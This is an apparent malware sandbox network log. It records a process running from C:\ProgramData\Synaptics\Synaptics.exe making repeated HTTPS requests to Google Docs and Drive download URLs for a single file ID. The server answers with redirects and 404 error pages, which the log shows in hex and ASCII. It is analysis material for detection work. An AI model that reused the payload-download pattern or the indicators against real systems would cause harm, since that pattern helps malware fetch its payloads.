                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:55 GMT
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-hosNYiIhRYXnivuXG93jxA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:55 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:55 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4c 5f 45 31 48 74 73 67 77 7a 34 52 38 58 30 36 63 71 33 2d 53 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="L_E1Htsgwz4R8X06cq3-SQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:55 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      61192.168.2.649955142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-BgJKzrYVe05FU6up-XTnjg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      62192.168.2.649956142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:56 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                                                                                                                      2024-12-30 10:40:56 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-LkZlDyeuh71nfBFD6-Z9yQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      63192.168.2.649958142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:56 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC4bYkTwNeCxPGp_3BhGc8ZU7DOExsdp1IJnRu92qe5Km7VW2QoWcDgcjCxUbhqLjseFfQwBzuY
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-u_yJCVKGR0Bue4MeWV9Jxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:56 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                      2024-12-30 10:40:56 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 35 58 4c 37 46 63 66 5f 6a 2d 72 53 70 65 33 30 66 4f 35 31 78 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                      Data Ascii: 404 (Not Found)!!1</title><style nonce="5XL7Fcf_j-rSpe30fO51xw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                      2024-12-30 10:40:56 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      64192.168.2.649957142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:56 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:57 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                      X-GUploader-UploadID: AFiumC78R_9SfpG1mtwdjUV-eg6feTIyisWy8tOGMQcE0WvK7eWQIg9JmQABwCfbf-EGA4t2
                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:56 GMT
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-88wrk4mwz5woJIo30CSorw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Content-Length: 1652
                                                                                                                      Server: UploadServer
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Content-Security-Policy: sandbox allow-scripts
                                                                                                                      Connection: close
                                                                                                                      2024-12-30 10:40:57 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                      Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                      2024-12-30 10:40:57 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6d 65 49 78 74 75 7a 6c 33 43 56 77 6d 5a 76 72 79 50 43 70 35 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                      Data Ascii: t Found)!!1</title><style nonce="meIxtuzl3CVwmZvryPCp5g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                      2024-12-30 10:40:57 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                      Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      65192.168.2.649968142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:57 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:57 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-FU1oq01ogPNEBV5QZerPGw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      66192.168.2.649967142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:57 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      67192.168.2.649969142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      68192.168.2.649970142.250.185.654434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:57 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Host: drive.usercontent.google.com
                                                                                                                      Connection: Keep-Alive
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7


                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                      69192.168.2.649978142.250.185.784434508C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                      2024-12-30 10:40:58 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                      User-Agent: Synaptics.exe
                                                                                                                      Host: docs.google.com
                                                                                                                      Cache-Control: no-cache
                                                                                                                      Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                                                                                                                      2024-12-30 10:40:58 UTC1314INHTTP/1.1 303 See Other
                                                                                                                      Content-Type: application/binary
                                                                                                                      Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                      Pragma: no-cache
                                                                                                                      Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                      Date: Mon, 30 Dec 2024 10:40:58 GMT
                                                                                                                      Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                      Content-Security-Policy: script-src 'report-sample' 'nonce-HQ-9PSNXkD6sVcWwW8KCEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                      Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                      Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                      Cross-Origin-Opener-Policy: same-origin
                                                                                                                      Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                      Server: ESF
                                                                                                                      Content-Length: 0
                                                                                                                      X-XSS-Protection: 0
                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                      Connection: close


